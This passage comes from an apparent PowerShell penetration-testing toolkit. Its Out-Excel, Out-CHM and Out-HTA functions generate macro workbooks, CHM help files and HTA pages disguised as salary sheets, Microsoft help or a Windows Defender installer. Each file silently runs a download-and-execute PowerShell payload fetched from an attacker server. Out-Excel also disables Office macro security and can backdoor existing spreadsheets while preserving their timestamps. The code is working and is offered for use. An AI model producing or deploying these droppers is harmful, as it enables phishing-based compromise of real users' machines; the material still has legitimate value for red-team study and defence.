4662PS > Out-Excel -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process"
4663
4664Use above command to provide your own payload to be executed from macro. A file named "Salary_Details.xls" would be generated
4665in user's temp directory.
4666
4667.EXAMPLE
4668PS > Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1
4669
4670Use above when you want to use the default payload, which is a powershell download and execute one-liner. A file
4671named "Salary_Details.xls" would be generated in user's temp directory.
4672
4673.EXAMPLE
4674PS > Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -Arguments
4675
4676Use above when you want to use the default payload, which is a powershell download and execute one-liner.
4677The Arugment parameter allows to pass arguments to the downloaded script.
4678
4679.EXAMPLE
4680PS > Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -OutputFile C:\xlsfiles\Generated.xls
4681
4682In above, the output file would be saved to the given path.
4683
4684.EXAMPLE
4685PS > Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -ExcelFileDir C:\xlsfiles\
4686
4687In above, in the C:\xlsfiles directory, macro enabled .xls files would be created for all the .xlsx files, with the same name
4688and same Last MOdified Time.
4689
4690.EXAMPLE
4691PS > Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -ExcelFileDir C:\xlsfiles\ -Recurse
4692
4693The above command would search recursively for .xlsx files in C:\xlsfiles.
4694
4695.EXAMPLE
4696PS > Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -ExcelFileDir C:\xlsfiles\ -Recurse -RemoveXlsx
4697
4698The above command would search recursively for .xlsx files in C:\xlsfiles, generate macro enabled .xls files and
4699delete the original files.
4700
4701.EXAMPLE
4702PS > Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -RemainSafe
4703
4704Out-Excel turns off Macro Security. Use -RemainSafe to turn it back on.
4705
4706
4707.LINK
4708http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
4709https://github.com/samratashok/nishang
4710#>
4711
4712
4713 [CmdletBinding()] Param(
4714
4715 [Parameter(Position=0, Mandatory = $False)]
4716 [String]
4717 $Payload,
4718
4719 [Parameter(Position=1, Mandatory = $False)]
4720 [String]
4721 $PayloadURL,
4722
4723 [Parameter(Position=2, Mandatory = $False)]
4724 [String]
4725 $Arguments,
4726
4727 [Parameter(Position=3, Mandatory = $False)]
4728 [String]
4729 $ExcelFileDir,
4730
4731 [Parameter(Position=4, Mandatory = $False)]
4732 [String]
4733 $OutputFile="$pwd\Salary_Details.xls",
4734
4735
4736 [Parameter(Position=5, Mandatory = $False)]
4737 [Switch]
4738 $Recurse,
4739
4740 [Parameter(Position=6, Mandatory = $False)]
4741 [Switch]
4742 $RemoveXlsx,
4743
4744 [Parameter(Position=7, Mandatory = $False)]
4745 [Switch]
4746 $RemainSafe
4747 )
4748
4749 #http://stackoverflow.com/questions/21278760/how-to-add-vba-code-in-excel-worksheet-in-powershell
4750 $Excel = New-Object -ComObject Excel.Application
4751 $ExcelVersion = $Excel.Version
4752 #Check for Office 2007 or Office 2003
4753 if (($ExcelVersion -eq "12.0") -or ($ExcelVersion -eq "11.0"))
4754 {
4755 $Excel.DisplayAlerts = $False
4756 }
4757 else
4758 {
4759 $Excel.DisplayAlerts = "wdAlertsNone"
4760 }
4761 #Turn off Macro Security
4762 New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
4763 New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
4764
4765 if(!$Payload)
4766 {
4767 $Payload = "powershell.exe -ExecutionPolicy Bypass -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
4768 }
4769 #Macro Code
4770 #Macro code from here http://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/
4771 $CodeAuto = @"
4772 Sub Auto_Open()
4773 Execute
4774
4775 End Sub
4776
4777
4778 Public Function Execute() As Variant
4779 Const HIDDEN_WINDOW = 0
4780 strComputer = "."
4781 Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
4782
4783 Set objStartup = objWMIService.Get("Win32_ProcessStartup")
4784 Set objConfig = objStartup.SpawnInstance_
4785 objConfig.ShowWindow = HIDDEN_WINDOW
4786 Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
4787 objProcess.Create "$Payload", Null, objConfig, intProcessID
4788 End Function
4789"@
4790
4791 $CodeWorkbook = @"
4792 Sub Workbook_Open()
4793 Execute
4794
4795 End Sub
4796
4797
4798 Public Function Execute() As Variant
4799 Const HIDDEN_WINDOW = 0
4800 strComputer = "."
4801 Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
4802
4803 Set objStartup = objWMIService.Get("Win32_ProcessStartup")
4804 Set objConfig = objStartup.SpawnInstance_
4805 objConfig.ShowWindow = HIDDEN_WINDOW
4806 Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
4807 objProcess.Create "$Payload", Null, objConfig, intProcessID
4808 End Function
4809"@
4810
4811
4812 if ($ExcelFileDir)
4813 {
4814 $ExcelFiles = Get-ChildItem $ExcelFileDir *.xlsx
4815 if ($Recurse -eq $True)
4816 {
4817 $ExcelFiles = Get-ChildItem -Recurse $ExcelFileDir *.xlsx
4818 }
4819 ForEach ($ExcelFile in $ExcelFiles)
4820 {
4821 $Excel = New-Object -ComObject Excel.Application
4822 $Excel.DisplayAlerts = $False
4823 $WorkBook = $Excel.Workbooks.Open($ExcelFile.FullName)
4824 $ExcelModule = $WorkBook.VBProject.VBComponents.Item(1)
4825 $ExcelModule.CodeModule.AddFromString($CodeWorkbook)
4826 $Savepath = $ExcelFile.DirectoryName + "\" + $ExcelFile.BaseName + ".xls"
4827 #Append .xls to the original file name if file extensions are hidden for known file types.
4828 if ((Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced).HideFileExt -eq "1")
4829 {
4830 $Savepath = $ExcelFile.FullName + ".xls"
4831 }
4832 $WorkBook.Saveas($SavePath, 18)
4833 Write-Output "Saved to file $SavePath"
4834 $Excel.Workbooks.Close()
4835 $LastModifyTime = $ExcelFile.LastWriteTime
4836 $FinalDoc = Get-ChildItem $Savepath
4837 $FinalDoc.LastWriteTime = $LastModifyTime
4838 if ($RemoveXlsx -eq $True)
4839 {
4840 Write-Output "Deleting $($ExcelFile.FullName)"
4841 Remove-Item -Path $ExcelFile.FullName
4842 }
4843 $Excel.Quit()
4844 [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel)
4845 }
4846 }
4847 else
4848 {
4849 $WorkBook = $Excel.Workbooks.Add(1)
4850 $WorkSheet=$WorkBook.WorkSheets.item(1)
4851 $ExcelModule = $WorkBook.VBProject.VBComponents.Add(1)
4852 $ExcelModule.CodeModule.AddFromString($CodeAuto)
4853 $WorkBook.SaveAs($OutputFile, 18)
4854 Write-Output "Saved to file $OutputFile"
4855 $Excel.Workbooks.Close()
4856 $Excel.Quit()
4857 [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel)
4858 }
4859
4860 if ($RemainSafe -eq $True)
4861 {
4862 #Turn on Macro Security
4863 New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\excel\Security" -Name AccessVBOM -Value 0 -Force | Out-Null
4864 New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\excel\Security" -Name VBAWarnings -Value 0 -Force | Out-Null
4865 }
4866}
4867
4868#######################################Out-CHM#############################################
4869
4870
4871function Out-CHM
4872{
4873
4874<#
4875.SYNOPSIS
4876Nishang script useful for creating Compiled HTML Help file (.CHM) which could be used to run PowerShell commands and scripts.
4877
4878.DESCRIPTION
4879The script generates a CHM file which needs to be sent to a target.
4880You must have hhc.exe (HTML Help Workshop) on your machine to use this script.
4881HTML Help Workshop is a free Microsoft Tool and could be downloaded from below link:
4882http://www.microsoft.com/en-us/download/details.aspx?id=21138
4883
4884.PARAMETER Payload
4885Payload which you want execute on the target.
4886
4887.PARAMETER PayloadURL
4888URL of the powershell script which would be executed on the target.
4889
4890.PARAMETER Arguments
4891Arguments to the powershell script to be executed on the target.
4892
4893.PARAMETER OutputPath
4894Path to the directory where the files would be saved. Default is the current directory.
4895
4896.EXAMPLE
4897PS > Out-CHM -Payload "Get-Process" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
4898
4899Above command would execute Get-Process on the target machine when the CHM file is opened.
4900
4901.EXAMPLE
4902PS > Out-CHM -PayloadURL http://192.168.254.1/Get-Information.ps1 -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
4903
4904Use above command to generate CHM file which download and execute the given powershell script in memory on target.
4905
4906.EXAMPLE
4907PS > Out-CHM -Payload "-EncodedCommand <>" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
4908
4909Use above command to generate CHM file which executes the encoded command/script.
4910Use Invoke-Encode from Nishang to encode the command or script.
4911
4912.EXAMPLE
4913PS > Out-CHM -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
4914
4915Use above command to pass an argument to the powershell script/module.
4916
4917.LINK
4918http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
4919https://github.com/samratashok/nishang
4920
4921.Notes
4922Based on the work mentioned in this tweet by @ithurricanept
4923https://twitter.com/ithurricanept/status/534993743196090368
4924#>
4925
4926
4927
4928 [CmdletBinding()] Param(
4929
4930 [Parameter(Position = 0, Mandatory = $False)]
4931 [String]
4932 $Payload,
4933
4934 [Parameter(Position = 1, Mandatory = $False)]
4935 [String]
4936 $PayloadURL,
4937
4938 [Parameter(Position = 2, Mandatory = $False)]
4939 [String]
4940 $Arguments,
4941
4942 [Parameter(Position = 3, Mandatory = $True)]
4943 [String]
4944 $HHCPath,
4945
4946 [Parameter(Position = 4, Mandatory = $False)]
4947 [String]
4948 $OutputPath="$pwd"
4949 )
4950
4951 #Check if the payload has been provided by the user
4952 if(!$Payload)
4953 {
4954 $Payload = "IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
4955 }
4956
4957 #Create the table of contents for the CHM
4958 $CHMTableOfContents = @"
4959<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
4960<HTML>
4961<HEAD>
4962<meta name="GENERATOR" content="Microsoft® HTML Help Workshop 4.1">
4963<!-- Sitemap 1.0 -->
4964</HEAD><BODY>
4965 <UL>
4966 <LI> <OBJECT type="text/sitemap">
4967 <param name="Name" value="IPv4 Advanced IP Settings Tab">
4968 <param name="Local" value="doc.htm">
4969 </OBJECT>
4970 </UL>
4971 <UL>
4972 <LI> <OBJECT type="text/sitemap">
4973 <param name="Name" value="IPv4 Advanced WINS Tab">
4974 <param name="Local" value="doc1.htm">
4975 </OBJECT>
4976 </UL>
4977 <UL>
4978 <LI> <OBJECT type="text/sitemap">
4979 <param name="Name" value="IPv4 Alternate Configuration Tab">
4980 <param name="Local" value="doc.htm">
4981 </OBJECT>
4982 </UL>
4983 <UL>
4984 <LI> <OBJECT type="text/sitemap">
4985 <param name="Name" value="IPv4 and IPv6 Advanced DNS Tab">
4986 <param name="Local" value="doc1.htm">
4987 </OBJECT>
4988 </UL>
4989</BODY>
4990</HTML>
4991"@
4992
4993 #Create the Project file for the CHM
4994 $CHMProject = @"
4995[OPTIONS]
4996Contents file=$OutputPath\doc.hhc
4997[FILES]
4998$OutputPath\doc.htm
4999$OutputPath\doc1.htm
5000"@
5001 #Create the HTM files, the first one controls the payload execution.
5002 $CHMHTML1 = @"
5003<HTML>
5004<TITLE>Check for Windows updates from Command Line</TITLE>
5005<HEAD>
5006</HEAD>
5007<BODY>
5008
5009<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
5010<PARAM name="Command" value="ShortCut">
5011 <PARAM name="Button" value="Bitmap::shortcut">
5012 <PARAM name="Item1" value=",cmd.exe,/c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile $Payload">
5013 <PARAM name="Item2" value="273,1,1">
5014</OBJECT>
5015
5016<SCRIPT>
5017x.Click();
5018</SCRIPT>
5019
5020<html DIR="LTR" xmlns:MSHelp="http://msdn.microsoft.com/mshelp" xmlns:ddue="http://ddue.schemas.microsoft.com/authoring/2003/5" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:tool="http://www.microsoft.com/tooltip"><head><META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=Windows-1252"></META><META NAME="save" CONTENT="history"></META><title>IPv4 Advanced IP Settings Tab</title><link rel="stylesheet" type="text/css" href="../local/Classic.css"></link><script src="../local/script.js"></script></head><body><div id="header"><h1>IPv4 Advanced IP Settings Tab</h1></div><div id="mainSection"><div id="mainBody"><p class="runningHeader"></p>
5021<p>You can use the settings on this tab for this network connection only if you are not using the <b>Obtain an IP address automatically</b> on the <b>General</b> tab.</p>
5022
5023<p><b>IP addresses</b> lists additional Internet Protocol version 4 (IPv4) addresses that can be assigned to this network connection. There is no limit to the number of IP addresses that can be configured. This setting is useful if this computer connects to a single physical network but requires advanced IP addressing because of either of the following reasons:</p>
5024
5025<ul><li class="unordered">
5026A single logical IP network is in use and this computer needs to use more than one IP address to communicate on that network.<br /><br />
5027</li><li class="unordered">
5028Multiple logical IP networks are in use and this computer needs a different IP address to communicate with each of the different logical IP networks.<br /><br />
5029</li></ul>
5030
5031<p><b>Default gateways</b> lists IP addresses for additional default gateways that can be used by this network connection. A default gateway is a local IP router that is used to forward packets to destinations beyond the local network. </p>
5032
5033<p><b>Automatic metric</b> specifies whether TCP/IP automatically calculates a value for an interface metric that is based on the speed of the interface. The highest-speed interface has the lowest interface metric value. </p>
5034
5035<p><b>Interface metric</b> provides a location for you to type a value for the interface metric for this network connection. A lower value for the interface metric indicates a higher priority for use of this interface. </p>
5036<h1 class="heading">Procedures</h1><div id="sectionSection0" class="section"><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
5037<table class="alertTable" cellspacing="0" cellpadding="0" xmlns=""><tr><td class="imgCell"><img class="note" src="../local/Procedure.gif"></img></td><td class="procHeadingCell"><b>To configure additional IP addresses for this connection</b></td></tr></table><ddue:steps><ol class="ordered" xmlns=""><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
5038<p xmlns="">In <b>IP Addresses</b>, click <b>Add</b>.<b> </b></p>
5039</content></li><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
5040<p xmlns="">Type an IP address in <b>IP address</b>. </p>
5041</content></li><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
5042<p xmlns="">Type a subnet mask in <b>Subnet mask</b>, and then click <b>Add</b>.</p>
5043</content></li><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
5044<p xmlns="">Repeat steps 1 through 3 for each IP address you want to add, and then click <b>OK</b>.</p>
5045</content></li></ol></ddue:steps>
5046
5047<table class="alertTable" cellspacing="0" cellpadding="0" xmlns=""><tr><td class="imgCell"><img class="note" src="../local/Procedure.gif"></img></td><td class="procHeadingCell"><b>To configure additional default gateways for this connection</b></td></tr></table><ddue:steps><ol class="ordered" xmlns=""><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
5048<p xmlns="">On the <b>IP Settings</b> tab, in <b>Default gateways</b>, click <b>Add</b>.</p>
5049</content></li><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
5050<p xmlns="">In <b>TCP/IP Gateway Address</b>, type the IP address of the default gateway in <b>Gateway</b>. To manually configure a default route metric, clear the <b>Automatic metric </b>check box and type a metric in <b>Metric</b>.</p>
5051</content></li><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
5052<p xmlns="">Click <b>Add</b>.</p>
5053</content></li><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
5054<p xmlns="">Repeat steps 1 through 3 for each default gateway you want to add, and then click <b>OK</b>.</p>
5055</content></li></ol></ddue:steps>
5056
5057<table class="alertTable" cellspacing="0" cellpadding="0" xmlns=""><tr><td class="imgCell"><img class="note" src="../local/Procedure.gif"></img></td><td class="procHeadingCell"><b>To configure a custom metric for this connection</b></td></tr></table><ddue:steps><ul xmlns=""><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
5058<p xmlns="">Clear the <b>Automatic metric</b> check box, and then type a metric value in <b>Interface metric</b>.</p>
5059</content></li></ul></ddue:steps>
5060</content></div><h1 class="heading">Additional references</h1><div id="sectionSection1" class="section"><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
5061<p xmlns="">For updated detailed IT pro information about TCP/IP versions 4 and 6, see <a href="http://go.microsoft.com/fwlink/?LinkID=117437" alt="" target="_blank"><linkText xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">http://go.microsoft.com/fwlink/?LinkID=117437</linkText></a> and <a href="http://go.microsoft.com/fwlink/?LinkID=71543" alt="" target="_blank"><linkText xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">http://go.microsoft.com/fwlink/?LinkID=71543</linkText></a>.</p>
5062</content></div></div><hr /><p /></div></body></html>
5063</BODY>
5064</HTML>
5065"@
5066 #Second help topic to make the file look authentic.
5067 $CHMHTML2 = @"
5068<html DIR="LTR" xmlns:MSHelp="http://msdn.microsoft.com/mshelp" xmlns:ddue="http://ddue.schemas.microsoft.com/authoring/2003/5" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:tool="http://www.microsoft.com/tooltip"><head><META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=Windows-1252"></META><META NAME="save" CONTENT="history"></META><title>IPv4 Advanced WINS Tab</title><link rel="stylesheet" type="text/css" href="../local/Classic.css"></link><script src="../local/script.js"></script></head><body><div id="header"><h1>IPv4 Advanced WINS Tab</h1></div><div id="mainSection"><div id="mainBody"><p class="runningHeader"></p>
5069<p>You can use the settings on this tab for this network connection only if you are not using the <b>Obtain an IP address automatically</b> on the <b>General</b> tab.</p>
5070
5071<p><b>WINS addresses, in order of use</b> lists the Windows Internet Name Service (WINS) servers that TCP/IP queries to resolve network basic input/output system (NetBIOS) names. WINS servers are queried in the order in which they are listed here.</p>
5072
5073<p><b>Enable LMHOSTS lookup</b> specifies whether an Lmhosts file is used to resolve the NetBIOS names of remote computers to an IP address. </p>
5074
5075<p>Click <b>Import LMHOSTS</b> to import a file into the Lmhosts file. The Lmhosts file is located in the %SystemRoot%\System32\Drivers\Etc folder on a Windows-based computer. There is also a sample Lmhosts file (Lmhosts.sam) in this folder. When you import LMHOSTS from a file, the original Lmhosts file is not appended to, but is overwritten by the new file.</p>
5076
5077<p><b>NetBIOS setting</b> specifies whether this network connection obtains the setting to enable or disable NetBIOS over TCP/IP (NetBT) from a Dynamic Host Configuration Protocol (DHCP) server. </p>
5078
5079<p>When an IP address is automatically obtained, the <b>Default</b> option is selected so that this computer uses the NetBT setting as optionally provided by the DHCP server when this computer obtains an IP address and configuration lease. If the Disable NetBIOS over TCP/IP (NetBT) DHCP option is provided by the DHCP server, the value of the option determines whether NetBT is enabled or disabled. If the Disable NetBIOS over TCP/IP (NetBT) DHCP option is not provided by the DHCP server, NetBT is enabled.</p>
5080
5081<p>If you are manually configuring an IP address, selecting <b>Enable NetBIOS over TCP/IP</b> enables NetBT. This option is not available for dial-up connections.</p>
5082<h1 class="heading">Procedures</h1><div id="sectionSection0" class="section"><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
5083<table class="alertTable" cellspacing="0" cellpadding="0" xmlns=""><tr><td class="imgCell"><img class="note" src="../local/Procedure.gif"></img></td><td class="procHeadingCell"><b>To configure advanced WINS properties</b></td></tr></table><ddue:steps><ol class="ordered" xmlns=""><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
5084<p xmlns="">In <b>WINS addresses, in order of use</b>, click <b>Add</b>, type the address of the WINS server, and then click <b>Add</b>.</p>
5085</content></li><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
5086<p xmlns="">Repeat step 1 for each WINS server IP address you want to add, and then click <b>OK</b>.</p>
5087</content></li></ol></ddue:steps>
5088
5089<table class="alertTable" cellspacing="0" cellpadding="0" xmlns=""><tr><td class="imgCell"><img class="note" src="../local/Procedure.gif"></img></td><td class="procHeadingCell"><b>To enable the use of the Lmhosts file to resolve remote NetBIOS names</b></td></tr></table><ddue:steps><ul xmlns=""><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
5090<p xmlns="">Select the <b>Enable LMHOSTS lookup</b> check box. This option is enabled by default.</p>
5091</content></li></ul></ddue:steps>
5092
5093<table class="alertTable" cellspacing="0" cellpadding="0" xmlns=""><tr><td class="imgCell"><img class="note" src="../local/Procedure.gif"></img></td><td class="procHeadingCell"><b>To specify the location of the file that you want to import into the Lmhosts file</b></td></tr></table><ddue:steps><ul xmlns=""><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
5094<p xmlns="">Click <b>Import LMHOSTS</b>, and then select the file in the <b>Open</b> dialog box.</p>
5095</content></li></ul></ddue:steps>
5096
5097<table class="alertTable" cellspacing="0" cellpadding="0" xmlns=""><tr><td class="imgCell"><img class="note" src="../local/Procedure.gif"></img></td><td class="procHeadingCell"><b>To enable or disable NetBIOS over TCP/IP</b></td></tr></table><ddue:steps><ul xmlns=""><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
5098<p xmlns="">To enable the use of NetBIOS over TCP/IP, click <b>Enable NetBIOS over TCP/IP</b>.</p>
5099</content></li><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
5100<p xmlns="">To disable the use of NetBIOS over TCP/IP, click <b>Disable NetBIOS over TCP/IP</b>.</p>
5101</content></li><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
5102<p xmlns="">To have the DHCP server determine whether NetBIOS over TCP/IP is enabled or disabled, click <b>Default</b>.</p>
5103</content></li></ul></ddue:steps>
5104</content></div><h1 class="heading">Additional references</h1><div id="sectionSection1" class="section"><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
5105<p xmlns="">For updated detailed IT pro information about TCP/IP versions 4 and 6, see <a href="http://go.microsoft.com/fwlink/?LinkID=117437" alt="" target="_blank"><linkText xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">http://go.microsoft.com/fwlink/?LinkID=117437</linkText></a> and <a href="http://go.microsoft.com/fwlink/?LinkID=71543" alt="" target="_blank"><linkText xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">http://go.microsoft.com/fwlink/?LinkID=71543</linkText></a>.</p>
5106</content></div></div><hr /><p /></div></body></html>
5107
5108"@
5109
5110 #Write all files to disk for compilation
5111 Out-File -InputObject $CHMTableOfContents -FilePath "$OutputPath\doc.hhc" -Encoding default
5112 Out-File -InputObject $CHMHTML1 -FilePath "$OutputPath\doc.htm" -Encoding default
5113 Out-File -InputObject $CHMHTML2 -FilePath "$OutputPath\doc1.htm" -Encoding default
5114 Out-File -InputObject $CHMProject -FilePath "$OutputPath\doc.hhp" -Encoding default
5115
5116 #Compile the CHM, only this needs to be sent to a target.
5117 $HHC = "$HHCPath" + "\hhc.exe"
5118 & "$HHC" "$OutputPath\doc.hhp"
5119
5120 #Cleanup
5121 Remove-Item "$OutputPath\doc.hhc"
5122 Remove-Item "$OutputPath\doc.htm"
5123 Remove-Item "$OutputPath\doc1.htm"
5124 Remove-Item "$OutputPath\doc.hhp"
5125
5126}
5127
5128#######################################Out-HTA#############################################
5129
5130function Out-HTA
5131{
5132<#
5133.SYNOPSIS
5134Nishang script which could be used for generating HTML Application and accompanying VBscript. These could be deployed on
5135a web server and powershell scripts and commands could be executed on the target machine.
5136
5137.DESCRIPTION
5138The script generates two files. A HTA file and a VBScript. The HTA and VBScript should be deployed in same directory of a web server.
5139When a target browses to the HTA file the VBScript is executed. This VBScript is used to execute powershell scripts and commands.
5140
5141.PARAMETER Payload
5142Payload which you want execute on the target.
5143
5144.PARAMETER PayloadURL
5145URL of the powershell script which would be executed on the target.
5146
5147.PARAMETER Arguments
5148Arguments to the powershell script to be executed on the target.
5149
5150.PARAMETER HTAFilePath
5151Path to the HTA file to be generated. Default is with the name WindDef_WebInstall.hta in the current directory.
5152
5153.PARAMETER VBFilename
5154Name of the VBScript file to be generated, use without ".vbs" extension. Default is launchps.vbs.
5155
5156.PARAMETER VBFilepath
5157Path to the HTA file to be generated. Default is with the name launchps.vbs in the current directory.
5158
5159.EXAMPLE
5160PS > Out-HTA -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem"
5161
5162Above command would execute Get-ChildItem on the target machine when the HTA is opened.
5163
5164.EXAMPLE
5165PS > Out-HTA -PayloadURL http://192.168.254.1/Get-Information.ps1
5166
5167Use above command to generate HTA and VBS files which download and execute the given powershell script in memory on target.
5168
5169.EXAMPLE
5170PS > Out-HTA -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM
5171
5172Use above command to pass an argument to the powershell script/module.
5173
5174.LINK
5175http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
5176https://github.com/samratashok/nishang
5177#>
5178
5179
5180 [CmdletBinding()] Param(
5181
5182 [Parameter(Position = 0, Mandatory = $False)]
5183 [String]
5184 $Payload,
5185
5186 [Parameter(Position = 1, Mandatory = $False)]
5187 [String]
5188 $PayloadURL,
5189
5190
5191 [Parameter(Position = 2, Mandatory = $False)]
5192 [String]
5193 $Arguments,
5194
5195 [Parameter(Position = 3, Mandatory = $False)]
5196 [String]
5197 $VBFilename="launchps.vbs",
5198
5199 [Parameter(Position = 4, Mandatory = $False)]
5200 [String]
5201 $HTAFilePath="$pwd\WindDef_WebInstall.hta",
5202
5203
5204 [Parameter(Position = 5, Mandatory = $False)]
5205 [String]
5206 $VBFilepath="$pwd\launchps.vbs"
5207 )
5208
5209 if(!$Payload)
5210 {
5211 $Payload = "powershell.exe -ExecutionPolicy Bypass -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
5212 }
5213
5214 $HTA = @"
5215 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
5216 <html xmlns="http://www.w3.org/1999/xhtml">
5217 <head>
5218 <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
5219 <title>Windows Defender Web Install</title>
5220 <script src="$VBFilename" type="text/vbscript" >
5221 </script>
5222 <hta:application
5223 id="oHTA"
5224 applicationname="Windows Defender Web Install"
5225 application="yes"
5226 >
5227 </hta:application>
5228 </head>
5229
5230 <SCRIPT TYPE="text/javascript">
5231 function start(){
5232
5233 Initialize();
5234
5235 }
5236 //-->
5237 </SCRIPT>
5238 <div>
5239 <object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">
5240 </object></div>
5241
5242
5243 <body onload="start()">
5244 </body>
5245 </html>
5246"@
5247
5248 $vbsscript = @"
5249 Sub Initialize()
5250 Set oShell = CreateObject( "WScript.Shell" )
5251 ps = "$Payload"
5252 oShell.run(ps),0,true
5253 End Sub
5254"@
5255
5256 Out-File -InputObject $HTA -FilePath $HTAFilepath
5257 Out-File -InputObject $vbsscript -FilePath $VBFilepath
5258 Write-Output "HTA and VBS written to $HTAFilepath and $VBFilepath respectively."
5259}
5260
5261
5262#######################################Out-Java#############################################
5263
5264function Out-Java
5265{
5266
5267<#
5268.SYNOPSIS
5269Nishang script which could be used for generating JAR to be used for applets.
5270
5271.DESCRIPTION
5272The script generates a Signed JAR and one line HTML code. These could be deployed on a web server. When a target opens
5273up the URL hosting these, the predefined PowerShell commands and scripts could be executed on the target.
5274
5275If you want to use valid/trusted certificate for signing use the -NoSelfSign option.
5276
5277The JAR generated checks for the OS architecture and calls the 32-bit version of PowerShell for script execution.
5278So you need to pass only the 32 bit shellcode to it. In case you would like to use 64 bit PowerShell, remove the "if"
5279condition marked in the source of Java code being generated.
5280
5281The script needs JDK to be installed on the attacker's machine. The parameters passed to keytool and jarsigner
5282could be changed in the source for further customization. Those are not asked as function parameters to keep the
5283number of parameters less for easy usage.
5284
5285.PARAMETER Payload
5286Payload which you want execute on the target.
5287
5288.PARAMETER $PayloadURL
5289URL of the powershell script which would be executed on the target.
5290
5291.PARAMETER $Arguments
5292Arguments to the powershell script to be executed on the target.
5293
5294.PARAMETER $JDKPath
5295Patj to the JDK to compile the .Java code.
5296
5297.PARAMETER $OutputPath
5298Path to the directory where the files would be saved. Default is the current directory.
5299
5300.PARAMETER $NoSelfSign
5301Use this switch if you don't want to create a self signed certificate for signing the JAR.
5302
5303.EXAMPLE
5304PS > Out-Java -Payload "Get-Process" -JDKPath "C:\Program Files\Java\jdk1.7.0_25"
5305
5306Above command would execute Get-Process on the target machine when the JAR or Class file is executed.
5307
5308.EXAMPLE
5309PS > Out-Java -PayloadURL http://192.168.254.1/Get-Information.ps1 -JDKPath "C:\Program Files\Java\jdk1.7.0_25"
5310
5311Use above command to generate JAR which download and execute the given powershell script in memory on target.
5312
5313.EXAMPLE
5314PS > Out-Java -Payload "-e <EncodedScript>" -JDKPath "C:\Program Files\Java\jdk1.7.0_25"
5315
5316Use above command to generate JAR which executes the encoded script.
5317Use Invoke-Command from Nishang to encode the script.
5318
5319.EXAMPLE
